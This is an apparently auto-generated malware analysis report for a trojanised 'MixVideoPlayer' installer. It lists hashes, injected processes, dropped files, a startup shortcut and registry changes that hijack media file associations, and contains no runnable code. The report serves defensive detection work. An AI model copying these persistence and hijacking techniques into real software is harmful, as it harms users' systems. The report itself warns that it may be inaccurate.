Trojan.Win32.IEDummy_2b23c515d4

by malwarelabrobot on June 7th, 2015 in Malware Descriptions.

Gen:Variant.Strictor.82398 (B) (Emsisoft), Trojan.Win32.IEDummy.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 2b23c515d40265fac88d0a61fd32755e
SHA1: 5469c0e96b2a2bb711521b6f2a96cfe75a64537e
SHA256: 53e29cf8bdabddda9705d12067443d05df0efcd0db42ef82c08eaaf631ad2781
SSDeep: 12288:Al/NiIoYAbvZO7wNJgHO78VN4zN8EMDOVUjW3Xg8oSABBq:AZjoY4EEyHWqN6KjzbPq
Size: 561976 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-03-26 15:49:32
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

mixvideoplayersetup.exe:1192
WPFFontCache_v0400.exe:3016
DeleteTasks.exe:2364
LTV2.exe:2108
LTV2.exe:2468
LTV2.exe:1012

The Trojan injects its code into the following process(es):

MixVideoPlayer.exe:2876
%original file name%.exe:1896
BrowserWeb.exe:2452

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process mixvideoplayersetup.exe:1192 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\MixVideoPlayer\Languages\ChineseT.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\Swedish.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\Danish.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\Hungarian.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\Estonian.ini (3 bytes)
%Program Files%\MixVideoPlayer\dotNetFx40_Full_setup.exe (30344 bytes)
%Program Files%\MixVideoPlayer\Languages\Slovak.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\NSISdl.dll (15 bytes)
%Program Files%\MixVideoPlayer\policy.2.0.taglib-sharp.config (377 bytes)
%Program Files%\MixVideoPlayer\BrowserWeb.exe (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\SimpleSC.dll (1856 bytes)
%Program Files%\MixVideoPlayer\references\libreria.png (244 bytes)
%Program Files%\MixVideoPlayer\Languages\Norwegian.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\German.ini (3 bytes)
%Program Files%\MixVideoPlayer\references\PhotoLoader.dll (784 bytes)
%Program Files%\MixVideoPlayer\Languages\Slovenian.ini (3 bytes)
%Program Files%\MixVideoPlayer\PhotoLoader.dll (784 bytes)
%Program Files%\MixVideoPlayer\Languages\Czech.ini (3 bytes)
%Program Files%\MixVideoPlayer\references\mixChecker.exe (27704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\AccessControl.dll (15 bytes)
%Program Files%\MixVideoPlayer\Languages\Polish.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp (4 bytes)
%Program Files%\MixVideoPlayer\references\Interop.SHDocVw.dll (5064 bytes)
%Program Files%\MixVideoPlayer\Languages\Catalan.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\ChineseS.ini (3 bytes)
%Program Files%\MixVideoPlayer\mixvideoplayer.affcode (3 bytes)
%Program Files%\MixVideoPlayer\uninstall.exe (3865 bytes)
%Program Files%\MixVideoPlayer\icon.ico (12536 bytes)
%Program Files%\MixVideoPlayer\Languages\Thai.ini (5 bytes)
%Program Files%\MixVideoPlayer\references\extvideo.png (146 bytes)
%Program Files%\MixVideoPlayer\references\extaudio.png (310 bytes)
%Program Files%\MixVideoPlayer\Languages\Russian.ini (5 bytes)
%Program Files%\MixVideoPlayer\references\ffmpeg.zip (946650 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\nsProcess.dll (4 bytes)
%Program Files%\MixVideoPlayer\Languages\Bulgarian.ini (5 bytes)
%Program Files%\MixVideoPlayer\Languages\Hindi.ini (6 bytes)
%Program Files%\MixVideoPlayer\Languages\Latvian.ini (3 bytes)
%Program Files%\MixVideoPlayer\NLog.dll (14184 bytes)
%Program Files%\MixVideoPlayer\Languages\Italian.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\Korean.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\French.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\Romanian.ini (3 bytes)
%Program Files%\MixVideoPlayer\icon-uninstall.ico (3616 bytes)
%Program Files%\MixVideoPlayer\Languages\Vietnamese.ini (4 bytes)
%Program Files%\MixVideoPlayer\Newtonsoft.Json.dll (16944 bytes)
%Program Files%\MixVideoPlayer\references\taglib-sharp.dll (15536 bytes)
%Program Files%\MixVideoPlayer\FrameworkControl.exe (12024 bytes)
%Program Files%\MixVideoPlayer\references\Newtonsoft.Json.dll (15536 bytes)
%Program Files%\MixVideoPlayer\Languages\Indonesian.ini (3 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MixVideoPlayer\Uninstall MixVideoPlayer.lnk (1 bytes)
%Program Files%\MixVideoPlayer\Languages\HaitianCreole.ini (3 bytes)
%Program Files%\MixVideoPlayer\Windows\Thumbs.db (1856 bytes)
%Program Files%\MixVideoPlayer\Languages\Greek.ini (5 bytes)
%Program Files%\MixVideoPlayer\Languages\Hebrew.ini (4 bytes)
%Program Files%\MixVideoPlayer\Languages\Finnish.ini (3 bytes)
%Program Files%\MixVideoPlayer\references\NDde.dll (3616 bytes)
%Program Files%\MixVideoPlayer\taglib-sharp.dll (15536 bytes)
%Program Files%\MixVideoPlayer\mixUpdater.exe (13368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2.tmp (183067 bytes)
%Program Files%\MixVideoPlayer\Snowplow.Tracker.dll (784 bytes)
%Program Files%\MixVideoPlayer\MixVideoPlayer.exe (82435 bytes)
%Program Files%\MixVideoPlayer\Languages\Japanese.ini (4 bytes)
%Program Files%\MixVideoPlayer\Languages\Portuguese.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\System.dll (11 bytes)
%Program Files%\MixVideoPlayer\Sider.dll (5064 bytes)
%Program Files%\MixVideoPlayer\Windows\logopeq-icon.ico (9608 bytes)
%Program Files%\MixVideoPlayer\LTV2.exe (6 bytes)
%Program Files%\MixVideoPlayer\Controls\ifishplayer-icon2.ico (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\ZipDLL.dll (6360 bytes)
%Program Files%\MixVideoPlayer\Languages\Ukrainian.ini (5 bytes)
%Program Files%\MixVideoPlayer\Microsoft.Win32.TaskScheduler.dll (8560 bytes)
%Program Files%\MixVideoPlayer\mixvideoplayer.uidnum (23 bytes)
%Program Files%\MixVideoPlayer\Languages\Arabic.ini (4 bytes)
%Program Files%\MixVideoPlayer\Languages\Turkish.ini (3 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MixVideoPlayer\MixVideoPlayer.lnk (1 bytes)
%Program Files%\MixVideoPlayer\Languages\Dutch.ini (3 bytes)
%Program Files%\MixVideoPlayer\references\policy.2.0.taglib-sharp.dll (3 bytes)
%Program Files%\MixVideoPlayer\Languages\English.ini (3 bytes)
%Program Files%\MixVideoPlayer\Controls\Thumbs.db (1552 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Startup\WebBrowserMixVideoPlayer.lnk (1 bytes)
%Program Files%\MixVideoPlayer\Languages\Spanish.ini (3 bytes)
%Documents and Settings%\%current user%\Desktop\MixVideoPlayer.lnk (1 bytes)
%Program Files%\MixVideoPlayer\references\policy.2.0.taglib-sharp.config (377 bytes)
%Program Files%\MixVideoPlayer\DeleteTasks.exe (10 bytes)
%Program Files%\MixVideoPlayer\references\Thumbs.db (5 bytes)
%Program Files%\MixVideoPlayer\Languages\Lithuanian.ini (3 bytes)
%Program Files%\MixVideoPlayer\policy.2.0.taglib-sharp.dll (3 bytes)
%Program Files%\MixVideoPlayer\LTVNetSdk.dll (14 bytes)
%Program Files%\MixVideoPlayer\references\folder.png (472 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsl1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\ZipDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\SimpleSC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\NSISdl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\nsProcess.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\AccessControl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp (0 bytes)

The process MixVideoPlayer.exe:2876 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (511 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\show_ads[1].js (7 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@n149adserv[2].txt (812 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\mixvideoplayer\log.txt (134 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp4.tmp (326 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ga[1].js (2187 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\MainBanner[1].htm (3 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@n149adserv[1].txt (637 bytes)
%System%\d3d9caps.tmp (1324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\analytics[1].js (740 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\show_ads[1].js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\arw[1].png (342 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\jquery.min[1].js (3155 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\analytics[1].htm (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mixvideoplayer[2].txt (4225 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\jquery.min[2].js (5043 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ga[2].js (2239 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\banner[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\mixvideoplayer\config\config.ini (252 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (15900 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\jquery.min[3].js (4562 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mixvideoplayer[1].txt (3790 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\arw[1].png (342 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (1024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\24075845-11900215[1].png (4 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\show_ads[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mixvideoplayer[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\jquery.min[2].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ga[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@n149adserv[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mixvideoplayer[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@n149adserv[1].txt (0 bytes)
%System%\d3d9caps.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\arw[1].png (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)

The process %original file name%.exe:1896 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\loading-install[1].gif (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\style[1].css (114 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\MixVideoPlayerSetup[1].exe (1792168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\i-download[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\loadingBar[1].gif (9823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\msjava[1].dll (465777 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\progress-bar[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\style[1].css (5083 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\bullet-short[1].gif (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\99bf1249-796b-43b5-839f-99f7def784ae\mixvideoplayersetup.exe (1792168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%System%\wbem\Logs\wbemprox.log (684 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\5c9fcfb67b8b50caf3ff80fda5f90c17f2908cdc58dc8a332caa164c680aca4d3d2a2f887f13872573de854a95eea05b833f5cf0a0c8699f[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\bf347a9c266220e0e770ae69b02713632b85a487869a70dd771b22fb58989f9aa3ebc8497ffa6be434bb903bf4e644ccef8f18175e98e50b[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\MixVideoPlayerSetup[1].exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\88e3cdf5a5346baa2b731227e7a325392c7d17c057f36ec1aa728dd48813418e75a639a1f3c174651b0f651572207b831c51a60cc8716716[1].txt (0 bytes)

Registry activity

The process mixvideoplayersetup.exe:1192 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\mixp.flv\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\.mp4]
"(Default)" = "mixp.mp4"

[HKCR\mixp.flv\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.3gp\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\.mkv]
"(Default)" = "mixp.mkv"

[HKCR\mixp.aac]
"(Default)" = "mixp media file (.aac)"

[HKCR\.mpeg]
"(Default)" = "mixp.mpeg"

[HKCR\mixp.mkv\shell]
"(Default)" = "Play"

[HKCR\mixp.mkv\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.mpeg\shell]
"(Default)" = "Play"

[HKCR\mixp.wmv]
"(Default)" = "mixp media file (.wmv)"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".3gp" = ""

[HKCR\.flv]
"(Default)" = "mixp.flv"

[HKCR\.wma]
"mixp.backup" = "WMAFile"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MixVideoPlayer]
"DisplayVersion" = "v1.0.0.18"

[HKCR\.mpg]
"(Default)" = "mixp.mpg"

[HKCR\.mov]
"(Default)" = "mixp.mov"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCR\mixp.wmv\shell]
"(Default)" = "Play"

[HKCR\.avi]
"(Default)" = "mixp.avi"

[HKCR\mixp.mp4\shell]
"(Default)" = "Play"

[HKCR\mixp.3gp\shell]
"(Default)" = "Play"

[HKCR\mixp.mp3\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.mov\shell]
"(Default)" = "Play"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCR\mixp.3gp\shell\Play]
"(Default)" = "Play"

[HKLM\SOFTWARE\MixVideoPlayer\MixVideoPlayer]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.divx]
"(Default)" = "mixp media file (.divx)"

[HKCR\mixp.mkv]
"(Default)" = "mixp media file (.mkv)"

[HKCR\.wma]
"(Default)" = "mixp.wma"

[HKCR\.aif]
"(Default)" = "mixp.aif"

[HKCR\mixp.avi\shell\Play]
"(Default)" = "Play"

[HKCR\.wav]
"mixp.backup" = "soundrec"

[HKCR\mixp.flv\shell]
"(Default)" = "Play"

[HKCR\.aif]
"mixp.backup" = "AIFFFile"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MixVideoPlayer]
"DisplayIcon" = "%Program Files%\MixVideoPlayer\icon.ico"

[HKCR\mixp.mov\shell\Play]
"(Default)" = "Play"

[HKCR\mixp.mpeg\shell\Play]
"(Default)" = "Play"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MixVideoPlayer]
"Publisher" = "SoftForce LLC"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MixVideoPlayer]
"DisplayName" = "MixVideoPlayer"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".AAC" = ""

[HKCR\mixp.aif\shell\Play]
"(Default)" = "Play"

[HKCR\mixp.divx\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.mp4\shell\Play]
"(Default)" = "Play"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".mpeg" = ""

[HKCR\mixp.wmv\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.mov]
"(Default)" = "mixp media file (.mov)"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".aif" = ""

[HKCR\mixp.3gp]
"(Default)" = "mixp media file (.3gp)"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Internet Explorer\Styles]
"MaxScriptStatements" = "4294967295"

[HKCR\mixp.mov\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCR\mixp.mpg]
"(Default)" = "mixp media file (.mpg)"

[HKCR\mixp.mp4\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.mpeg]
"(Default)" = "mixp media file (.mpeg)"

[HKCR\mixp.divx\shell\Play]
"(Default)" = "Play"

[HKCR\.wav]
"(Default)" = "mixp.wav"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".flv" = ""

[HKCR\mixp.avi]
"(Default)" = "mixp media file (.avi)"

[HKCR\mixp.wma]
"(Default)" = "mixp media file (.wma)"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 E2 1E E3 92 D8 67 D8 EA 71 56 C5 F7 22 19 79"

[HKCR\.divx]
"(Default)" = "mixp.divx"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".divx" = ""

[HKCR\mixp.mp4\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.avi\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".wma" = ""

[HKCR\Applications\MixVideoPlayer.exe]
"FriendlyAppName" = "MixVideoPlayer"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".mkv" = ""
".wmv" = ""

[HKCR\mixp.3gp\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "11001"

[HKCR\mixp.wav\shell\Play]
"(Default)" = "Play"

[HKCR\mixp.wma\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.wmv\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MixVideoPlayer]
"EstimatedSize" = "19713"

[HKCR\mixp.wmv\shell\Play]
"(Default)" = "Play"

[HKCR\mixp.aif\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.mpg\shell\Play]
"(Default)" = "Play"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\mixp.mp3\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.avi\shell]
"(Default)" = "Play"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MixVideoPlayer]
"UninstallString" = "%Program Files%\MixVideoPlayer\uninstall.exe"

[HKCR\mixp.mp4]
"(Default)" = "mixp media file (.mp4)"

[HKCR\Applications\MixVideoPlayer.exe]
"(Default)" = ""

[HKCR\mixp.mp3\shell\Play]
"(Default)" = "Play"

[HKCR\mixp.aac\shell\Play]
"(Default)" = "Play"

[HKCR\.aac]
"(Default)" = "mixp.aac"

[HKCR\mixp.aif]
"(Default)" = "mixp media file (.aif)"

[HKCR\mixp.avi\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCR\mixp.mp3]
"(Default)" = "mixp media file (.mp3)"

[HKCR\.mp3]
"mixp.backup" = "mp3file"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".avi" = ""

[HKCR\.mpg]
"mixp.backup" = "mpegfile"

[HKCR\mixp.aif\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\Applications\MixVideoPlayer.exe\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.flv]
"(Default)" = "mixp media file (.flv)"

[HKCR\mixp.divx\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.mkv\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.wav\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCR\mixp.aac\shell]
"(Default)" = "Play"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\mixp.aac\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.mpg\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.wav\shell]
"(Default)" = "Play"

[HKCR\mixp.wav\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.mkv\shell\Play]
"(Default)" = "Play"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".mov" = ""

[HKCR\mixp.mpg\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.mov\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".MP3" = ""

[HKLM\SOFTWARE\MixVideoPlayer\MixVideoPlayer]
"InstallDir" = "%Program Files%\MixVideoPlayer"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".mp4" = ""

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"BrowserWeb.exe" = "11001"

[HKCR\mixp.mpeg\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.wma\shell]
"(Default)" = "Play"

[HKCR\.wmv]
"mixp.backup" = "WMVFile"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCR\mixp.aif\shell]
"(Default)" = "Play"

[HKCR\mixp.aac\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCR\mixp.flv\shell\Play]
"(Default)" = "Play"

[HKCR\.3gp]
"(Default)" = "mixp.3gp"

[HKCR\.avi]
"mixp.backup" = "avifile"

[HKCR\.wmv]
"(Default)" = "mixp.wmv"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".mpg" = ""

[HKCR\mixp.mpg\shell]
"(Default)" = "Play"

[HKCR\mixp.wma\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\.mp3]
"(Default)" = "mixp.mp3"

[HKCR\mixp.mpeg\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.wav]
"(Default)" = "mixp media file (.wav)"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".WAV" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\mixp.divx\shell]
"(Default)" = "Play"

[HKCR\.mpeg]
"mixp.backup" = "mpegfile"

